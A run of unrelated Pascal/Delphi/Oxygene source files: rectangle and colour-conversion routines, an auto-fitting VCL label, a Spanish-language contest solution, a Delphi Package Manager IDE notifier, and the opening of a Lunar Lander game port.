Round(Value.X); Result.Top := Round(Value.Y); Result.Right := Result.Left + Round(Value.Width); Result.Bottom := Result.Top + Round(Value.Height); end; class operator TRectF.Equal(const A, B: TRectF): Boolean; begin Result := A.Equals(B); end; class operator TRectF.NotEqual(const A, B: TRectF): Boolean; begin Result := not A.Equals(B); end; class function TRectF.Create: TRectF; begin Result.X := 0; Result.Y := 0; Result.Width := 0; Result.Height := 0; end; class function TRectF.Create(Size: TPointF): TRectF; begin Result.X := 0; Result.Y := 0; Result.Width := Size.X; Result.Height := Size.Y; end; class function TRectF.Create(W, H: Float): TRectF; begin Result.X := 0; Result.Y := 0; Result.Width := W; Result.Height := H; end; class function TRectF.Create(X, Y, W, H: Float): TRectF; begin Result.X := X; Result.Y := Y; Result.Width := W; Result.Height := H; end; function TRectF.Equals(const Value: TRectF): Boolean; begin Result := (X = Value.X) and (Y = Value.Y) and (Width = Value.Width) and (Width = Value.Width); end; function TRectF.Contains(X, Y: Float): Boolean; begin Result := Contains(TPointF.Create(X, Y)); end; function TRectF.Contains(const P: TPointF): Boolean; begin if Empty then Exit(False); Result := (X <= P.X) and (X + Width > P.X) and (Y <= P.Y) and (Y + Height > P.Y); end; procedure TRectF.Center(X, Y: Float); begin Self.X := X - Width / 2; Self.Y := Y - Height / 2; end; procedure TRectF.Center(const P: TPointF); begin X := P.X - Width / 2; Y := P.Y - Height / 2; end; procedure TRectF.Center(const R: TRectF); begin Center(R.MidPoint) end; procedure TRectF.Inflate(X, Y: Float); begin Self.X := Self.X - X; Self.Y := Self.Y - Y; Width := Width + X * 2; Height := Height + Y * 2; end; procedure TRectF.Inflate(const P: TPointF); begin X := X - P.X; Y := Y - P.Y; Width := Width + P.X * 2; Height := Height + P.Y * 2; end; procedure TRectF.Offset(X, Y: Float); begin Self.X := Self.X + X; Self.Y := Self.Y + Y; end; procedure TRectF.Offset(const P: TPointF); begin X := X + P.X; Y := Y + P.Y; end; function TRectF.GetEmpty: Boolean; begin Result := (Width < 1) or (Height < 1); end; procedure TRectF.SetLeft(Value: Float); var I: Float; begin I := X + Width; X := Value; Width := I - X; end; procedure TRectF.SetTop(Value: Float); var I: Float; begin I := Y + Height; Y := Value; Height := I - Y; end; function TRectF.GetRight: Float; begin Result := X + Width; end; procedure TRectF.SetRight(Value: Float); begin Width := Value - X; end; function TRectF.GetBottom: Float; begin Result := Y + Height; end; procedure TRectF.SetBottom(Value: Float); begin Height := Value - Y; end; function TRectF.GetSize: TPointF; begin Result := TPointF.Create(Width, Height); end; function TRectF.GetTopLeft: TPointF; begin Result := TPointF.Create(X, Y); end; function TRectF.GetTopRight: TPointF; begin Result := TPointF.Create(X + Width, Y); end; function TRectF.GetBottomLeft: TPointF; begin Result := TPointF.Create(X, Y + Height); end; function TRectF.GetBottomRight: TPointF; begin Result := TPointF.Create(X + Width, Y + Height); end; function TRectF.GetMidPoint: TPointF; begin Result := TPointF.Create(X + Width / 2, Y + Height / 2); end; function TRectF.GetMidLeft: TPointF; begin Result := TPointF.Create(X, Y + Height / 2); end; function TRectF.GetMidTop: TPointF; begin Result := TPointF.Create(X + Width / 2, Y); end; function TRectF.GetMidRight: TPointF; begin Result := TPointF.Create(X + Width, Y + Height / 2); end; function TRectF.GetMidBottom: TPointF; begin Result := TPointF.Create(X + Width / 2, Y + Height); end; { THSL } class operator THSL.Implicit(Value: Float): THSL; begin Result.Hue := Remainder(Value, 1); if Result.Hue < 0 then Result.Hue := 1 - Result.Hue; Result.Lightness := 0.5; Result.Saturation := 1; end; class operator THSL.Implicit(const Value: THSL): Float; begin Result := Value.Hue; end; { TColorB } class operator TColorB.Implicit(const Value: THSL): TColorB; const OneOverThree = 1 / 3; var M1, M2: Float; H, S, L, R, G, B: Float; function HueToColor(Hue: Float): Float; var V: Double; begin Hue := Hue - Floor(Hue); if 6 * Hue < 1 then V := M1 + (M2 - M1) * Hue * 6 else if 2 * Hue < 1 then V := M2 else if 3 * Hue < 2 then V := M1 + (M2 - M1) * (2 / 3 - Hue) * 6 else V := M1; Result := V; end; begin H := Remainder(Value.Hue, 1); if H < 0 then H := 1 - H; S := Clamp(Value.Saturation); L := Clamp(Value.Lightness); if S = 0 then begin R := L; G := L; B := L; end else begin if L <= 0.5 then M2 := L * (1 + S) else M2 := L + S - L * S; M1 := 2 * L - M2; R := HueToColor(H + OneOverThree); G := HueToColor(H); B := HueToColor(H - OneOverThree) end; Result.Red := Round(R * HiByte); Result.Green := Round(G * HiByte); Result.Blue := Round(B * HiByte); Result.Alpha := HiByte; end; class operator TColorB.Explicit(Value: TColorB): THSL; var B, R, G, D, CMax, CMin: Single; begin B := Value.Blue / HiByte; G := Value.Green / HiByte; R := Value.Red / HiByte; CMax := Max(R, Max(G, B)); CMin := Min(R, Min(G, B)); Result.Lightness := (CMax + CMin) / 2; if CMax = CMin then begin Result.Hue := 0; Result.Saturation := 0 end else begin D := CMax - CMin; if Result.Lightness < 0.5 then Result.Saturation := D / (CMax + CMin) else Result.Saturation := D / (2 - CMax - CMin); if R = CMax then Result.Hue := (G - B) / D else if G = CMax then Result.Hue := 2 + (B - R) / D else Result.Hue := 4 + (R - G) / D; Result.Hue := Result.Hue / 6; if Result.Hue < 0 then Result.Hue := Result.Hue + 1 end; end; class function TColorB.Create(R, G, B: Byte; A: Byte = $FF): TColorB; begin Result.Red := R; Result.Green := G; Result.Blue := B; Result.Alpha := A; end; function MixB(V1: Byte; P1: Float; V2: Byte; P2: Float): Byte; overload; begin Result := Round(V1 * P1 + V2 * P2); end; function MixF(V1, P1, V2, P2: Float): Float; overload; begin Result := V1 * P1 + V2 * P2; end; function TColorB.Blend(Value: TColorB; Percent: Float): TColorB; var Compliment: Float; begin if Percent = 0 then Exit(Self); if Percent = 1 then Exit(Value); Compliment := 1 - Percent; Result.Red := MixB(Value.Red, Percent, Red, Compliment); Result.Green := MixB(Value.Green, Percent, Green, Compliment); Result.Blue := MixB(Value.Blue, Percent, Blue, Compliment); Result.Alpha := MixB(Value.Alpha, Percent, Alpha, Compliment); end; function TColorB.Desaturate(Percent: Float): TColorB; var Gray: Byte; Compliment: Float; begin if Percent = 0 then Exit(Self); Gray := Round(Red * 0.2126 + Green * 0.7152 + Blue * 0.0722); Result.Alpha := Alpha; if Percent = 1 then begin Result.Red := Gray; Result.Green := Gray; Result.Blue := Gray; end else begin Compliment := 1 - Percent; Result.Blue := MixB(Gray, Percent, Blue, Compliment); Result.Green := MixB(Gray, Percent, Green, Compliment); Result.Red := MixB(Gray, Percent, Red, Compliment); end; end; function TColorB.Darken(Percent: Float): TColorB; var Compliment: Float; begin if Percent = 0 then Exit(Self); Result.Alpha := Alpha; if Percent = 1 then begin Result.Blue := 0; Result.Green := 0; Result.Red := 0; end else begin Compliment := 1 - Percent; Result.Blue := MixB(0, Percent, Blue, Compliment); Result.Green := MixB(0, Percent, Green, Compliment); Result.Red := MixB(0, Percent, Red, Compliment); end; end; function TColorB.Lighten(Percent: Float): TColorB; var Compliment: Float; begin if Percent = 0 then Exit(Self); Result.Alpha := Alpha; if Percent = 1 then begin Result.Blue := HiByte; Result.Green := HiByte; Result.Red := HiByte; end else begin Compliment := 1 - Percent; Result.Blue := MixB(HiByte, Percent, Blue, Compliment); Result.Green := MixB(HiByte, Percent, Green, Compliment); Result.Red := MixB(HiByte, Percent, Red, Compliment); end; end; function TColorB.Fade(Percent: Float): TColorB; begin Result := Self; if Percent = 1 then Exit(Self); Result.Alpha := Round(Result.Alpha * Percent); end; { TColorF } function GetColorF(const C: TColorB): TColorF; begin Result.Blue := C.Blue / HiByte; Result.Green := C.Green / HiByte; Result.Red := C.Red / HiByte; Result.Alpha := C.Alpha / HiByte; end; function GetColorB(const C: TColorF): TColorB; begin Result.Blue := Round(Clamp(C.Blue) * HiByte); Result.Green := Round(Clamp(C.Green) * HiByte); Result.Red := Round(Clamp(C.Red) * HiByte); Result.Alpha := Round(Clamp(C.Alpha) * HiByte); end; class operator TColorF.Implicit(const Value: THSL): TColorF; begin Result := GetColorF(TColorB(Value)); end; class operator TColorF.Explicit(const Value: TColorF): THSL; begin Result := THSL(GetColorB(Value)); end; class operator TColorF.Implicit(Value: TColorB): TColorF; begin Result := GetColorF(Value); end; class operator TColorF.Explicit(const Value: TColorF): TColorB; begin Result := GetColorB(Value); end; class function TColorF.Create(B, G, R: Float; A: Byte = 1): TColorF; begin Result.Blue := B; Result.Green := G; Result.Red := R; Result.Alpha := A; end; function TColorF.Blend(const Value: TColorF; Percent: Float): TColorF; var Compliment: Float; begin Percent := Clamp(Percent); if Percent < 0.0001 then Exit(Self); if Percent > 0.9999 then Exit(Value); Compliment := 1 - Percent; Result.Blue := MixF(Blue, Compliment, Value.Blue, Percent); Result.Green := MixF(Green, Compliment, Value.Green, Percent); Result.Red := MixF(Red, Compliment, Value.Red, Percent); Result.Alpha := MixF(Alpha, Compliment, Value.Alpha, Percent); end; function TColorF.Desaturate(Percent: Float): TColorF; var Gray: Float; Compliment: Float; begin Percent := Clamp(Percent); if Percent < 0.0001 then Exit(Self); Gray := Red * 0.2126 + Green * 0.7152 + Blue * 0.0722; Result.Alpha := Alpha; if Percent > 0.9999 then begin Result.Blue := Gray; Result.Green := Gray; Result.Red := Gray; end else begin Compliment := 1 - Percent; Result.Blue := MixF(Gray, Percent, Blue, Compliment); Result.Green := MixF(Gray, Percent, Green, Compliment); Result.Red := MixF(Gray, Percent, Red, Compliment); end; end; function TColorF.Fade(Percent: Float): TColorF; begin Result := Self; Result.Alpha := Clamp(Percent); end; { Color routines } function Hue(H: Float): TColorB; begin Result := THSL(H); end; function Blend(A, B: TColorB; Percent: Float): TColorB; begin Result := A.Blend(B, Percent); end; function Fade(Color: TColorB; Percent: Float): TColorB; begin Result := Color.Fade(Percent); end; function Darken(Color: TColorB; Percent: Float): TColorB; begin Result := Color.Darken(Clamp(Percent)); end; function Lighten(Color: TColorB; Percent: Float): TColorB; begin Result := Color.Lighten(Clamp(Percent)); end; {$endregion} end.
unit NfsLabel; interface {$R 'nfslabel.dcr'} uses SysUtils, Classes, Controls, StdCtrls, Messages, Winapi.Windows; type RAktuell = record Text : string; Width : Integer; FontSize: Integer; end; type TNfsLabel = class(TCustomLabel) private _MaxFontSize: Integer; _MinFontSize: Integer; _Aktuell: RAktuell; _CanChangedMaxFontSize: Boolean; //FDrawTextProc: TFNDrawText; procedure FitFontSize; procedure CMFontChanged(var Message: TMessage); message CM_FONTCHANGED; procedure SetMinFontSize(const Value: Integer); //procedure DoDrawNormalText(DC: HDC; const Text: UnicodeString; var TextRect: TRect; TextFlags: Cardinal); //function getDrawText(var Rect: TRect; Flags: Longint): String; //procedure UpdateDrawTextProc; protected procedure Paint; override; public constructor Create(AOwner: TComponent); override; published property Align; property Alignment; property Anchors; property BiDiMode; property Caption; property Color nodefault; property Constraints; property DragCursor; property DragKind; property DragMode; property EllipsisPosition; property Enabled; property FocusControl; property Font; property ParentBiDiMode; property ParentColor; property ParentFont; property ParentShowHint; property PopupMenu; property ShowAccelChar; property ShowHint; property Transparent; property Layout; property Visible; property WordWrap; property OnClick; property OnContextPopup; property OnDblClick; property OnDragDrop; property OnDragOver; property OnEndDock; property OnEndDrag; property OnMouseActivate; property OnMouseDown; property OnMouseMove; property OnMouseUp; property OnMouseEnter; property OnMouseLeave; property OnStartDock; property OnStartDrag; property MinFontSize: Integer read _MinFontSize write SetMinFontSize default 1; end; procedure Register; implementation uses Vcl.Themes; procedure Register; begin RegisterComponents('new frontiers', [TNfsLabel]); end; { TNfsLabel } constructor TNfsLabel.Create(AOwner: TComponent); begin inherited Create(AOwner); _Aktuell.Text := ''; _Aktuell.Width := 0; _Aktuell.FontSize := 0; AutoSize := false; _CanChangedMaxFontSize := true; if _MinFontSize <= 0 then _MinFontSize := 8; //UpdateDrawTextProc; end; procedure TNfsLabel.CMFontChanged(var Message: TMessage); begin inherited; if _CanChangedMaxFontSize then _MaxFontSize := Font.Size; end; procedure TNfsLabel.FitFontSize; //const // Alignments: array[TAlignment] of Word = (DT_LEFT, DT_RIGHT, DT_CENTER); // WordWraps: array[Boolean] of Word = (0, DT_WORDBREAK); var Text: string; TextWidth: Integer; //DrawStyle: Longint; //Rect, CalcRect: TRect; begin _CanChangedMaxFontSize := false; try { DrawStyle := DT_EXPANDTABS or WordWraps[WordWrap] or Alignments[Alignment]; if Layout <> tlTop then begin CalcRect := Rect; Text := getDrawText(CalcRect, DrawStyle or DT_CALCRECT); if Layout = tlBottom then OffsetRect(Rect, 0, Height - CalcRect.Bottom) else OffsetRect(Rect, 0, (Height - CalcRect.Bottom) div 2); end; Text := getDrawText(Rect, DrawStyle); } Text := GetLabelText; TextWidth := Canvas.TextWidth(Text); if (_Aktuell.Text = Text) and (_Aktuell.Width = Width) and (_Aktuell.FontSize = Font.Size) then exit; Canvas.Font := Font; Font.Size := _MaxFontSize; if (Font.Size = _MaxFontSize) and (Width >= TextWidth) then exit; Canvas.Font := Font; while Width <= TextWidth do begin Canvas.Font.Size := Canvas.Font.Size -1; if (Canvas.Font.Size = 1) or (_MinFontSize = Canvas.Font.Size) then break; TextWidth := Canvas.TextWidth(Text); end; Font.Size := Canvas.Font.Size; _Aktuell.Text := Text; _Aktuell.Width := Width; _Aktuell.FontSize := Font.Size; finally _CanChangedMaxFontSize := true; end; end; procedure TNfsLabel.Paint; begin inherited; FitFontSize; end; procedure TNfsLabel.SetMinFontSize(const Value: Integer); begin _MinFontSize := Value; if _MinFontSize <= 0 then _MinFontSize := 1; end; (* procedure TNfsLabel.UpdateDrawTextProc; begin FDrawTextProc := DoDrawNormalText; end; procedure TNfsLabel.DoDrawNormalText(DC: HDC; const Text: UnicodeString; var TextRect: TRect; TextFlags: Cardinal); begin Winapi.Windows.DrawTextW(DC, Text, Length(Text), TextRect, TextFlags); end; *) (* function TNfsLabel.getDrawText(var Rect: TRect; Flags: Longint): String; const EllipsisStr = '...'; Ellipsis: array[TEllipsisPosition] of Longint = (0, DT_PATH_ELLIPSIS, DT_END_ELLIPSIS, DT_WORD_ELLIPSIS); var Text, DText: string; NewRect: TRect; Height, Delim: Integer; begin Text := GetLabelText; if (Flags and DT_CALCRECT <> 0) and ((Text = '') or ShowAccelChar and (Text[1] = '&') and (Length(Text) = 1)) then Text := Text + ' '; if Text <> '' then begin if not ShowAccelChar then Flags := Flags or DT_NOPREFIX; Flags := DrawTextBiDiModeFlags(Flags); Canvas.Font := Font; if (EllipsisPosition <> epNone) and not AutoSize then begin DText := Text; Flags := Flags and not DT_EXPANDTABS; Flags := Flags or Ellipsis[EllipsisPosition]; if WordWrap and (EllipsisPosition in [epEndEllipsis, epWordEllipsis]) then begin repeat NewRect := Rect; Dec(NewRect.Right, Canvas.TextWidth(EllipsisStr)); FDrawTextProc(Canvas.Handle, DText, NewRect, Flags or DT_CALCRECT); Height := NewRect.Bottom - NewRect.Top; if (Height > ClientHeight) and (Height > Canvas.Font.Height) then begin Delim := LastDelimiter(' '#9, Text); if Delim = 0 then Delim := Length(Text); Dec(Delim); {$IF NOT DEFINED(CLR)} if ByteType(Text, Delim) = mbLeadByte then Dec(Delim); {$IFEND} Text := Copy(Text, 1, Delim); DText := Text + EllipsisStr; if Text = '' then Break; end else Break; until False; end; if Text <> '' then Text := DText; end; Result := Text; { if Enabled or StyleServices.Enabled then FDrawTextProc(Canvas.Handle, Text, Rect, Flags) else begin OffsetRect(Rect, 1, 1); Canvas.Font.Color := clBtnHighlight; FDrawTextProc(Canvas.Handle, Text, Rect, Flags); OffsetRect(Rect, -1, -1); Canvas.Font.Color := clBtnShadow; FDrawTextProc(Canvas.Handle, Text, Rect, Flags); end; } end; end; *) end.
{$I-,Q-,R-,S-} {Problema 12: Jardín de Flores [Rob Kolstad, 2007] Imagine la sorpresa de Betsy cuando ella rodeó el establo y encontró que le Granjero Juan ha construido un invernadero secreto que ahora tiene flores maravillosas. Su mente corrió rápidamente y se llenó de visiones de un florido jardín en su pequeña mente bovina. “Yo pienso que haré una larga fila de F (7 <= F <= 10,000) flores contra la cerca”, ella pensó. “Plantaré rosas en cada tercer hoyo, begonias en cada séptimo hoyo que aún estén disponibles, y margaritas en cada cuarto hoyo que aún esté disponible.” Betsy pensaba cuántos hoyos abiertos quedarían. Ella se dio cuenta que el número dependería en cual hoyo ella comenzaría a plantar cuando ella intentara llenar cada eNésimo hoyo con una clase de flores. Ayude a Betsy a saber cuantos hoyos abiertos quedaran. Lea un conjunto de K (1 <= K <= 100) descriptores de plantaciones, cada uno de los cuales dice una ubicación inicial L (1 <= L <= F) -- L=1 es la primera flor -- y un intervalo I (1 <= I <= F) para plantar flores. Deduzca el número de hoyos vacíos que permanecerán libres después de plantar todo el conjunto. Si Betsy siguió su visión original, ella podría especificar la plantación como sigue: 30 3 [30 hoyos en total; 3 clases de flores] 1 3 [comenzar en el hoyo 1 y plantar rosas cada tercer hoyo] 3 7 [comenzar en el hoyo 3 y plantar begonias cada séptimo hoyo] 1 4 [comenzar en el hoyo 1 y plantar margaritas cada cuarto hoyo] Por lo tanto, el jardín vacío se vería como esto: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Luego, después de plantar las rosas: R . . R . . R . . R . . R . . R . . R . . R . . R . . R . . Luego, después de plantar las begonias: R . B R . . R . . R . . R . . R B . R . . R . B R . . R . . Luego, después de plantar las margaritas: R . B R M . R . M R . . R . . R B . R . M R . B R . . R M . Quedan 13 hoyos vacíos después de la plantación NOMBRE DEL PROBLEMA: flowers FORMATO DE ENTRADA: * Línea 1: Dos enteros separados por espacio: N y K. *Líneas 2..K+1: La línea j contiene dos enteros separados por espacio que especifican la plantación de una clase de flor: L_j y I_j ENTRADA EJEMPLO (archivo flowers.in): 30 3 1 3 3 7 1 4 DETALLES DE LA ENTRADA Como en el texto del problema FORMATO DE SALIDA: * Línea 1: Una sola línea con un solo entero que es el número de hoyos que permanecen vacíos después de completar la plantación. SALIDA EJEMPLO (archivo latin.out): 13 DETALLE DE LA SALIDA Como en el texto } const mx = 10001; var fe,fs : text; n,m,sol : longint; mk : array[1..mx] of boolean; procedure open; begin assign(fe,'flowers.in'); reset(fe); assign(fs,'flowers.out'); rewrite(fs); readln(fe,n,m); end; procedure work; var i,j,k : longint; begin sol:=0; for i:=1 to m do begin readln(fe,j,k); while j <= n do begin if not mk[j] then begin mk[j]:=true; inc(sol); end; j:=j + k; end; end; end; procedure closer; begin writeln(fs,n-sol); close(fs); end; begin open; work; closer; end.
{***************************************************************************} { } { Delphi Package Manager - DPM } { } { Copyright © 2019 Vincent Parrett and contributors } { } { vincent@finalbuilder.com } { https://www.finalbuilder.com } { } { } {***************************************************************************} { } { Licensed under the Apache License, Version 2.0 (the "License"); } { you may not use this file except in compliance with the License. } { You may obtain a copy of the License at } { } { http://www.apache.org/licenses/LICENSE-2.0 } { } { Unless required by applicable law or agreed to in writing, software } { distributed under the License is distributed on an "AS IS" BASIS, } { WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. } { See the License for the specific language governing permissions and } { limitations under the License. } { } {***************************************************************************} unit DPM.IDE.IDENotifier; interface uses ToolsApi, Spring.Collections, DPM.IDE.Logger, DPM.IDE.ProjectController; {$IF CompilerVersion >= 24.0 } {$LEGACYIFEND ON} {$IFEND} // The IDE notifier is used to receive notifications from the IDE and pass them // to the ProjectController. Note that the file notifications are not fired when // the IDE reloads due to external modifications (including by us) - so we still' // need the StorageNotifier type TDPMIDENotifier = class(TInterfacedObject, IOTANotifier, IOTAIDENotifier) private FLogger : IDPMIDELogger; FLoadingGroup : boolean; FGroupProjects : IList<string>; FProjectController : IDPMIDEProjectController; protected //IOTANotifier procedure AfterSave; procedure BeforeSave; procedure Destroyed; procedure Modified; //IOTAIDENotifier procedure AfterCompile(Succeeded : Boolean); procedure BeforeCompile(const Project : IOTAProject; var Cancel : Boolean); procedure FileNotification(NotifyCode : TOTAFileNotification; const FileName : string; var Cancel : Boolean); function LoadProjectGroup(const fileName : string) : boolean; public constructor Create(const logger : IDPMIDELogger; const projectController : IDPMIDEProjectController); destructor Destroy; override; end; implementation uses System.SysUtils, DPM.Core.Utils.Path, DPM.Core.Utils.System, DPM.Core.Project.Interfaces, DPM.Core.Project.GroupProjReader; { TDPMIDENotifier } procedure TDPMIDENotifier.AfterCompile(Succeeded : Boolean); begin end; procedure TDPMIDENotifier.AfterSave; begin end; procedure TDPMIDENotifier.BeforeCompile(const Project : IOTAProject; var Cancel : Boolean); begin end; procedure TDPMIDENotifier.BeforeSave; begin end; constructor TDPMIDENotifier.Create(const logger : IDPMIDELogger; const projectController : IDPMIDEProjectController); begin FLogger := logger; FGroupProjects := TCollections.CreateList < string > ; FProjectController := projectController; end; destructor TDPMIDENotifier.Destroy; begin inherited; end; procedure TDPMIDENotifier.Destroyed; begin end; function TDPMIDENotifier.LoadProjectGroup(const fileName : string) : boolean; var i : integer; groupReader : IGroupProjectReader; projectRoot : string; ext : string; begin result := false; FGroupProjects.Clear; groupReader := TGroupProjectReader.Create(FLogger); if groupReader.LoadGroupProj(fileName) then begin groupReader.ExtractProjects(FGroupProjects); projectRoot := ExtractFilePath(fileName); //projects likely to be relative, so make them full paths for i := 0 to FGroupProjects.Count - 1 do begin ext := ExtractFileExt(FGroupProjects[i]); //TODO : Allow cbproj when cbuilder supported. if ext = '.dproj' then begin //sysutils.IsRelativePath returns false with paths starting with .\ if TPathUtils.IsRelativePath(FGroupProjects[i]) then //TPath.Combine really should do this but it doesn't FGroupProjects[i] := TPathUtils.CompressRelativePath(projectRoot, FGroupProjects[i]) end; end; result := true; end; end; procedure TDPMIDENotifier.FileNotification(NotifyCode : TOTAFileNotification; const FileName : string; var Cancel : Boolean); var ext : string; begin ext := ExtractFileExt(FileName); //we only care about the project and project group files, ignoring all other notifications. if not (SameText(ext, '.dproj') or SameText(ext, '.groupproj')) then exit; case NotifyCode of ofnFileOpening : begin FLogger.Debug('TDPMIDENotifier ofnFileOpening : ' + FileName); TSystemUtils.OutputDebugString('TDPMIDENotifier ofnFileOpening : ' + FileName); {$IF CompilerVersion < 34.0} { Since there's no built in way to determine when the project group has finished loading, we have to cheat here. We load up the list of projects in the group, and then as each one is loaded (we get notified here) we remove them from the list. when the list is empty we are done and can continue. This has the added benefit of running restore when the grouproj is loading but before the project is loaded, so no reload loop to deal with! } if ext = '.groupproj' then begin if not FLoadingGroup then begin //if the groupproj doesn't exist, it's a placeholder and we are about to load a single project //this seems a bit iffy.. doesn't always happen. if not FileExists(FileName) then begin FProjectController.BeginLoading(TProjectMode.pmSingle); exit; end; //the group file exists, so we are definitely loading a group FLoadingGroup := true; //need this to determine when we are done loading the project group. if not LoadProjectGroup(FileName) then begin //Cancel := true; //stop loading as the group file is messed up? //not sure this is the right thing to do, we might have a bug that is our fault. exit; end; FProjectController.BeginLoading(TProjectMode.pmGroup); end; exit; end else if not FLoadingGroup then //we are loading a single project that is not part of a project group. FProjectController.BeginLoading(TProjectMode.pmSingle); {$ELSE} //10.4 adds ofnBeginProjectGroupOpen, ofnEndProjectGroupOpen, ofnBeginProjectGroupClose, ofnEndProjectGroupClose //so we will use those for the project group. if (ext = '.groupproj') then exit; if not FLoadingGroup then FProjectController.BeginLoading(TProjectMode.pmSingle); {$IFEND} if FileExists(FileName) then FProjectController.ProjectOpening(FileName); end; ofnFileOpened : begin //make sire we ignore the groupproj here. if ext <> '.dproj' then exit; FLogger.Debug('TDPMIDENotifier ofnFileOpened ' + FileName); TSystemUtils.OutputDebugString('TDPMIDENotifier ofnFileOpened : ' + FileName); {$IF CompilerVersion < 34.0} if FLoadingGroup then begin FGroupProjects.Remove(FileName); if FGroupProjects.Count = 0 then begin FLoadingGroup := false; FProjectController.EndLoading(TProjectMode.pmGroup); end; end else FProjectController.EndLoading(TProjectMode.pmSingle); {$ELSE} if not FLoadingGroup then FProjectController.EndLoading(TProjectMode.pmSingle); {$IFEND} end; ofnFileClosing : begin FLogger.Debug('TDPMIDENotifier ofnFileClosing ' + FileName); TSystemUtils.OutputDebugString('TDPMIDENotifier ofnFileClosing : ' + FileName); if (ext = '.dproj') then FProjectController.ProjectClosed(FileName) else FProjectController.ProjectGroupClosed; end; {$IF CompilerVersion >= 34.0 } //10.4 or later ofnBeginProjectGroupOpen : begin FLogger.Debug('TDPMIDENotifier ofnBeginProjectGroupOpen ' + FileName); TSystemUtils.OutputDebugString('TDPMIDENotifier ofnBeginProjectGroupOpen : ' + FileName); //if the project file doesn't exist, it's a temporary file and a single project is about to be opened. if not FileExists(FileName) then exit; FLoadingGroup := true; FProjectController.BeginLoading(TProjectMode.pmGroup); end; ofnEndProjectGroupOpen : begin FLogger.Debug('TDPMIDENotifier ofnEndProjectGroupOpen ' + FileName); TSystemUtils.OutputDebugString('TDPMIDENotifier ofnEndProjectGroupOpen : ' + FileName); if not FileExists(FileName) then exit; FProjectController.EndLoading(TProjectMode.pmGroup); FLoadingGroup := true; end; ofnBeginProjectGroupClose : begin FLogger.Debug('TDPMIDENotifier ofnBeginProjectGroupClose ' + FileName); TSystemUtils.OutputDebugString('TDPMIDENotifier ofnBeginProjectGroupClose : ' + FileName); FProjectController.ProjectGroupClosed; // FLogger.Clear; end; ofnEndProjectGroupClose : begin TSystemUtils.OutputDebugString('TDPMIDENotifier ofnEndProjectGroupClose : ' + FileName); FLogger.Debug('TDPMIDENotifier ofnEndProjectGroupClose ' + FileName); end; {$IFEND} else exit; end; end; procedure TDPMIDENotifier.Modified; begin FLogger.Debug('TDPMIDENotifier.Modified'); end; end.
namespace com.example.android.lunarlander; {* * Copyright (C) 2007 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. *} //BUG: The original Android SDK demo has this bug: //If the game is over and in a win or lose state, rotating the phone or switching away from //the game pauses, so when we come back we can unpause and then immediately win or lose again. //To work around that the implementation of saveState and restoreState should probably //take into account a win or lose state //BUG: The original Android SDK demo has this bug: //Switching away from the app and then back crashes the app with an IllegalThreadStateException interface uses android.content, android.content.res, android.graphics, android.graphics.drawable, android.os, android.util, android.view; type LunarThread = public class(Thread) private const KEY_DIFFICULTY = 'mDifficulty'; const KEY_DX = 'mDX'; const KEY_DY = 'mDY'; const KEY_FUEL = 'mFuel'; const KEY_GOAL_ANGLE = 'mGoalAngle'; const KEY_GOAL_SPEED = 'mGoalSpeed'; const KEY_GOAL_WIDTH = 'mGoalWidth'; const KEY_GOAL_X = 'mGoalX'; const KEY_HEADING = 'mHeading'; const KEY_LANDER_HEIGHT = 'mLanderHeight'; const KEY_LANDER_WIDTH = 'mLanderWidth'; const KEY_WINS = 'mWinsInARow'; const KEY_X = 'mX'; const KEY_Y = 'mY'; const KEY_MODE = 'mMode'; // Member (state) fields // Handle to the application context, used to e.g. fetch Drawables. var mContext: Context; // The drawable to use as the background of the animation canvas var mBackgroundImage: Bitmap; // Current height of the surface/canvas. // see setSurfaceSize var mCanvasHeight: Integer := 1; // Current width of the surface/canvas. // see setSurfaceSize var mCanvasWidth: Integer := 1; // What to draw for the Lander when it has crashed var mCrashedImage: Drawable; // // Current difficulty -- amount of fuel, allowed angle, etc. Default is // MEDIUM. var mDifficulty: Integer; // Velocity dx. var mDX: Double; // Velocity dy. var mDY: Double; // Is the engine burning? var mEngineFiring: Boolean; // What to draw for the Lander when the engine is firing var mFiringImage: Drawable; // Fuel remaining var mFuel: Double; // Allowed angle. var mGoalAngle: Integer; // Allowed speed. var mGoalSpeed: Integer; // Width of the landing pad. var mGoalWidth: Integer; // X of the landing pad. var mGoalX: Integer; // Message handler used by thread to interact with TextView var mHandler: Handler; // Lander heading in degrees, with 0 up, 90 right. Kept in the range // 0..360. var mHeading: Double; // Pixel height of lander image. var mLanderHeight: Integer; // What to draw for the Lander in its normal state var mLanderImage: Drawable; // Pixel width of lander image. var mLanderWidth: Integer; // Used to figure out elapsed time between frames var mLastTime: Int64; // Paint to draw the lines on screen. var mLinePaint: Paint; // "Bad" speed-too-high variant of the line color. var mLinePaintBad: Paint; // The state of the game. One of READY, RUNNING, PAUSE, LOSE, or WIN var mMode: Integer; // Currently rotating, -1 left, 0 none, 1 right. var mRotating: Integer; // Scratch rect object. var mScratchRect: RectF; // Handle to the surface manager object we interact with var mSurfaceHolder: SurfaceHolder; // Number of wins in a row. var mWinsInARow: Integer; // X of lander center. var mX: Double; // Y of lander center. var mY: Double; // To cater for thread pause/resume management var mPauseLock: Object := new Object; var mPaused: Boolean; method doDraw(aCanvas: Canvas); method updatePhysics; assembly method doKeyDown(keyCode: Integer; msg: KeyEvent): Boolean; method doKeyUp(keyCode: Integer; msg: KeyEvent): Boolean; public // Difficulty setting constants const DIFFICULTY_EASY = 0; const DIFFICULTY_HARD = 1; const DIFFICULTY_MEDIUM = 2; // Physics constants const PHYS_DOWN_ACCEL_SEC = 35; const PHYS_FIRE_ACCEL_SEC = 80; const PHYS_FUEL_INIT = 60; const PHYS_FUEL_MAX = 100; const PHYS_FUEL_SEC = 10; const PHYS_SLEW_SEC = 120; // degrees/second rotate const PHYS_SPEED_HYPERSPACE = 180; const PHYS_SPEED_INIT = 30; const PHYS_SPEED_MAX = 120; // State-tracking constants const STATE_LOSE = 1; const STATE_PAUSE = 2; const STATE_READY = 3; const STATE_RUNNING = 4; const STATE_WIN = 5; // Goal condition constants const TARGET_ANGLE = 18; // > this angle means crash const TARGET_BOTTOM_PADDING = 17; // px below gear const TARGET_PAD_HEIGHT = 8; // how high above ground const TARGET_SPEED = 28; // > this speed means crash const 